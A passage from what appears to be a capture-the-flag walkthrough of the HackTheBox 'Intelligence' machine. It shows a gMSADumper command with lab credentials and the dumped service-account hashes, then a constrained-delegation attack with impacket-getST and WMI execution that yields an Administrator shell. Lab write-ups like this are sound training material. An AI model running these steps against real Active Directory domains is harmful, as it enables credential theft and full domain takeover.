After searching online, there is a tool which is able to dump out the password. {% embed url="" %} After running the tool, the LM Hash for `SVC_INT` user is dumped out. ``` $ python3 gMSADumper.py -u 'ted.graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 10.10.10.248 Users or groups who can read password for svc_int$: > DC$ > itsupport svc_int$:::c6c4f38fb3032ea3d1a401b5aab1fb0d svc_int$:aes256-cts-hmac-sha1-96:d514b740f0165e845896bcd82613774c1669b4b5b9f1232c88cc2321949e6a86 svc_int$:aes128-cts-hmac-sha1-96:12c88420d8038a7d0c80f1bab7269a16 ``` From the finding in bloodhound, the `SVC_INT` user is able to do this: `AllowedToDelegate` to `DC.INTELLIGENCE.HTB`. So, we can use `impacket-getST` to get the TGT as `Administrator` user. However, due to the time skew we need to ensure the `set-ntp` is set to `0` in order to change the date time
After generating the ccache file, I am able to login using `impacket-wmicexec` to get the `Administrator` shell.